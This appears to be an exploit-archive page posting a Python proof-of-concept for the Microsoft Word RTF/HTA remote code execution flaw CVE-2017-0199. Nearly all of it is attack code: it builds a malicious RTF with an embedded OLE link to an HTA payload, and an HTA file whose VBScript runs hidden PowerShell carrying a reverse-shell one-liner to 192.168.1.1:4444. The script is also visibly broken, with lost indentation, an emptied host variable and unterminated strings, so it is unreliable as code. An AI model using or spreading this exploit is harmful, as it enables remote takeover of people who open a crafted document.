Home / os / winmobile

Microsoft Word MTA Handler Remote Code Execution

Posted on 28 June 2017

# Exploit Author: Juan Sacco at KPN Red Team
# Developed using Exploit Pack - http://www.exploitpack.com
<jsacco@exploitpack.com>
#
# Description: Microsoft Word (CVE-2017-0199) is prone to a RCE trough
a HTA Handler
# A remote code execution vulnerability exists in the way that
Microsoft Office and WordPad parse specially crafted files.
# An attacker who successfully exploited this vulnerability could take
control of an affected system.
#
# Impact: An attacker could exploit this vulnerability to execute
arbitrary commands in the
# context of the application. Failed exploit attempts could result in a
# denial-of-service condition.
#
# Vendor homepage: http://www.microsoft.com
#
# Credits: @ShadowBrokerss @EquationGroup @Petya @juansacco

import binascii
def chunk_str(str, chunk_size):
return [str[i:i+chunk_size] for i in range(0, len(str), chunk_size)]
hta_host="" # 127.0.0.1
for i in chunk_str(binascii.hexlify(b'http://127.0.0.1'),2):
hta_host+= str(i+"00")
hta_host="" # 127.0.0.1
hta_object = "01000002090000000100000000000000"
hta_object += "0000000000000000a4000000e0c9ea79"
hta_object += "f9bace118c8200aa004ba90b8c000000"
hta_object += hta_host
hta_object += "00000000795881f43b1d7f48af2c825d"
hta_object += "c485276300000000a5ab0000ffffffff"
hta_object += "0609020000000000c000000000000046"
hta_object += "00000000ffffffff0000000000000000"
hta_object += "906660a637b5d2010000000000000000"
hta_object += "00000000000000000000000000000000"
hta_object += "100203000d0000000000000000000000"
hta_object += "0"*480
rtf_template = "{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe2052\themelang1033\themelangfe2052\themelangcs0
{\info
{\author
Microsoft}
{\operator Microsoft}
}
{\*\xmlnstbl {\xmlns1
http://schemas.microsoft.com/office/word/2003/wordml}}
{
{\object\objautlink\objupdate\rsltpict\objw291\objh230\objscalex99\objscaley101
{\*\objclass
Word.Document.8}
{\*\objdata
0105000002000000
090000004f4c45324c696e6b000000000000000000000a0000
d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000003000000000000c000000000000046000000000000000000000000704d
6ca637b5d20103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000
000000000000000000000000f00000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000
0000000000000000000004000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000
00000000000000000000000005000000b700000000000000010000000200000003000000fefffffffeffffff0600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
"
rtf_template += hta_object
rtf_template += "0105000000000000}
{\result {\rtlch\fcs1
\af31507 \ltrch\fcs0 \insrsid1979324 }}}}
{\*\datastore
}
}
"
print("[*] Microsoft Word RCE - HTA Handler by Juan Sacco")
file_rtf = open("exploitpack.rtf","w")
file_rtf.write(rtf_template)
file_rtf.close()
print("[*] RTF File created")
print rtf_template
# Extra bonus PS Reverse one-liner
ps_reverse_shell = "$sm=(New-Object
Net.Sockets.TCPClient("192.168.1.1",4444)).GetStream();[byte[]]$bt=0..255|%{0};while(($i=$sm.Read($bt,0,$bt.Length))
-ne 0){;$d=(New-Object
Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex
$d 2>&1));$sm.Write($st,0,$st.Length)}
" # Reverse to 192.168.1.1
4444
hta_template = "<script language="VBScript">
Set pwnShell =
CreateObject("Wscript.Shell") 
Set fsObject =
CreateObject("Scripting.FileSystemObject")
If
fsObject.FileExists(pwnShell.ExpandEnvironmentStrings("%PSModulePath%")
+ "..\powershell.exe") Then
 pwnShell.Run "powershell.exe
-nop -w hidden -e "
hta_template += ps_reverse_shell
hta_template += "",0
End If
window.close()
</script>
"
file_hta = open("exploitpack.hta","w")
file_hta.write(hta_template)
file_hta.close()
print("[*] HTA File created")
print hta_template
print("[*] Thanks NSA!")
print("[*] Creditz: @EquationGroup @ShadowBrokers @juansacco")
print("[*] KPN Red team: <juan.sacco@kpn.com>")

 

TOP